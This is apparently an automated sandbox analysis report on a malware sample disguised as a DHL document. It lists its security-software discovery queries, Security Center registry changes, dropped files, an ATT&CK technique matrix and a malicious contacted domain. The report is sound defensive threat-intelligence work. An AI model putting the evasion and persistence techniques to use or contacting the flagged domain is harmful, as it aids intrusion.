Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Registry Run Keys / Startup Folder11	Process Injection111	Masquerading222	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	Registry Run Keys / Startup Folder11	Disable or Modify Tools21	LSASS Memory	Security Software Discovery131	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Virtualization/Sandbox Evasion141	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Virtualization/Sandbox Evasion141	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol3	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Timestomp1	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	System Information Discovery22	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DHL_document11022020680908911.exe	15%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	15%	ReversingLabs
C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	15%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-	0%	URL Reputation	safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837	0%	URL Reputation	safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837	0%	URL Reputation	safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://www.liverpool.com/all-about/premier-league	0%	URL Reputation	safe
https://www.liverpool.com/all-about/premier-league	0%	URL Reputation	safe
https://www.liverpool.com/all-about/premier-league	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/	0%	URL Reputation	safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154	0%	URL Reputation	safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154	0%	URL Reputation	safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst	0%	URL Reputation	safe
https://reachplc.hub.loginradius.com"	0%	Avira URL Cloud	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690	0%	URL Reputation	safe
https://s2-prod.liverpool.com	0%	URL Reputation	safe
https://s2-prod.liverpool.com	0%	URL Reputation	safe
https://s2-prod.liverpool.com	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816	0%	URL Reputation	safe
https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837	0%	URL Reputation	safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837	0%	URL Reputation	safe
https://myliverpoolnews.cf4=k	0%	Avira URL Cloud	safe
https://i2-prod.liverpool.com	0%	URL Reputation	safe
https://i2-prod.liverpool.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myliverpoolnews.cf	172.67.150.212	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2657AF87F290203D3CADB14A1F61B73C.html	true	Avira URL Cloud: safe	unknown
http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000011.00000002.315639072.000002886D63D000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000011.00000002.315980166.000002886D65C000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000011.00000003.310953123.000002886D64A000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000003.240448674.0000000006EC2000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.371893373.00000000069B2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://c.amazon-adsystem.com/aax2/apstag.js	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false		high
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000011.00000003.311219184.000002886D661000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837	svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000011.00000003.311386179.000002886D65A000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000011.00000003.311767855.000002886D641000.00000004.00000001.sdmp	false		high
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000003.240448674.0000000006EC2000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.371893373.00000000069B2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.448084288.0000000006C52000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.453301847.00000000074C9000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.liverpool.com/all-about/premier-league	svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg	DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, DHL_document11022020680908911.exe, 00000000.00000002.296724824.0000000003064000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347902692.0000000005FB2000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.369051616.00000000070FB000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.488562641.0000000007E72000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
